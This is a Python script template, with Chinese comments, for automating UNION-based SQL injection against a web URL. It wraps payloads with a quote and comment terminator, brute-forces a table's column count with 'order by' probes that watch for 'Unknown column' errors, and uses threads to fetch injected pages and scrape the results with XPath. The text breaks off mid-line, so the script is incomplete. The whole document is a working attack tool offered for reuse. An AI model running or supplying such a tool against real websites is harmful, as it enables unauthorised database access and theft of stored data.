UNION联合注入 python脚本模板
import requests
import threading
import queue
from lxml import etree
import re
NUM=5
LIST=[]
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0'}
def bypass(payload):
'''
:param payload:
:return:
'''
if payload:
if 'order' not in payload:
payload+=' limit {},1'
payload = "' "+payload
payload += " --+"
return payload
def brute_field_num(url):
'''
暴力测试数据表的字段数
:param url:
:return: 数据表的字段数
'''
try:
n=1
while True:
payload=url+bypass(" order by {}".format(n))
print(payload)
res=requests.get(payload,headers=headers)
if 'Unknown column' in res.text:
return n-1
n+=1
except Exception as e:
print(e)
class UnionSql(threading.Thread):
def __init__(self,url,xpath,q):
self.url=url
self.xpath=xpath
self.q=q
super().__init__()
def run(self):
global LIST
headers={
'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0'}
str1 = ''
n=self.q.get()
payload=self.url.format(n)
res=requests.get(payload,headers=headers).text
html=etree.HTML(res)
text=html.xpath(self.xpath)
LIST.append(text)
def main(url,xpath):
q = queue.Queue()
thread_list = []
for n in range(NUM):
q.put(n)
for n in range(NUM)<